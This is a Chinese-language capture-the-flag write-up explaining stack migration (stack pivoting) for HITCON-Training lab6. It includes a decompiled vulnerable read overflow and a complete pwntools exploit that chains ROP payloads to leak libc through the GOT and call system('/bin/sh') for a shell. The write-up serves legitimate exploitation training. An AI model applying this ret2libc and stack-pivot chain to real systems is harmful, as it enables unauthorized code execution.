栈转移

Thunder_J

0x00：前言

栈转移(stack immigration)主要是为了解决栈溢出可以溢出空间大小不足的问题，HITCON-Training-master 的 lab6 就是用的这个原理，我们来实践一下这道题目。

0x01：实例

题目链接：
https://github.com/scwuaptx/HITCON-Training/blob/master/LAB/lab6/migration

运行一下程序，结构很简单，接受完输入就退出，保护开启了堆栈不可执行

Thunder_J@Thunder_J-virtual-machine:~/桌面$ ./migration 
Try your best :
aaaa
Thunder_J@Thunder_J-virtual-machine:~/桌面$ checksec migration 
 '/home/Thunder_J/\xe6\xa1\x8c\xe9\x9d\xa2/migration'
    Arch:     i386-32-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

放入IDA分析一下，漏洞很明显，read函数读 0x40 的大小，buf的大小只有0x28，我们可以利用0x40 - 0x28 = 0x18 的大小

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf; // [esp+0h] [ebp-28h]

  if ( count != 1337 )
    exit(1);
  ++count;
  setvbuf(_bss_start, 0, 2, 0);
  puts("Try your best :");
  return read(0, &buf, 0x40u);
}

题目的意思是让我们转移栈，我们可以通过改变ebp的值，再执行 leave ret 来实现对栈的转移，我们一共分三次 payload 发送，首先第一次我们将偏移找好，将ebp转移到bss+0x500处，然后调用read函数实现写bss+0x500处的内容，也就是payload2的内容

# mov stack to bss + 0x500
payload1 = 'a'*40 + p32(elf.bss() + 0x500) + p32(read_plt) + p32(leave_ret) + p32(0) + p32(buf) +p32(0x100)

第二次payload我们通过泄露puts函数的地址计算出libc的基地址，然后调用read函数写bss+0x400处的内容，也就是payload3的内容

# leak libc
payload2 = p32(buf2) + p32(puts_plt) + p32(pop_ebx) + p32(puts_got) + p32(read_plt) + p32(leave_ret)
payload2 += p32(0) + p32(buf2) + p32(0x100)

payload3的内容就更加清晰了，直接调用system("\bin\sh")来getshell

payload3 = p32(buf) + p32(system_addr) + 'bbbb' + p32(binsh)

总结来说就是因为溢出我们可以利用的内容太小了，必须进行栈转移，转移到可以执行的地址来写我们的shellcode，把一个shellcode一步一步分开来写，最后getshell，总的exp如下：

from pwn import *

context.log_level = 'debug'
r = remote('127.0.0.1',4000)
#r = process('./migration')
lib = ELF('/lib32/libc.so.6')
elf = ELF('./migration')

read_plt = elf.symbols['read']
puts_plt = elf.symbols['puts']
read_got = elf.got['read']
puts_got = elf.got['puts']
puts_lib = lib.symbols['puts']
system_lib = lib.symbols['system']

buf = elf.bss() + 0x500
buf2 = elf.bss() + 0x400

pop_ebx = 0x0804836d
pop3ret = 0x8048569
leave_ret = 0x08048418

r.recvuntil(':\n')

# mov stack to bss + 0x500
payload1 = 'a'*40 + p32(buf) + p32(read_plt) + p32(leave_ret) + p32(0) + p32(buf) +p32(0x100)

r.send(payload1)
sleep(0.1)
# leak libc
payload2 = p32(buf2) + p32(puts_plt) + p32(pop_ebx) + p32(puts_got) + p32(read_plt) + p32(leave_ret)
payload2 += p32(0) + p32(buf2) + p32(0x100)

r.send(payload2)
sleep(0.1)
puts_addr = u32(r.recv(4))

print "puts_addr:" + hex(puts_addr)

libc_base = puts_addr - puts_lib
print "libc base is " + hex(libc_base)
system_addr = libc_base + system_lib
binsh_libc = lib.search("/bin/sh").next()
binsh = binsh_libc + libc_base
payload3 = p32(buf) + p32(system_addr) + 'bbbb' + p32(binsh)
r.send(payload3)
sleep(0.1)

r.interactive()

0x02：总结

这种方法利用的地方比较奇特，还是需要多加锻炼
参考链接：
https://blog.csdn.net/zszcr/article/details/79841848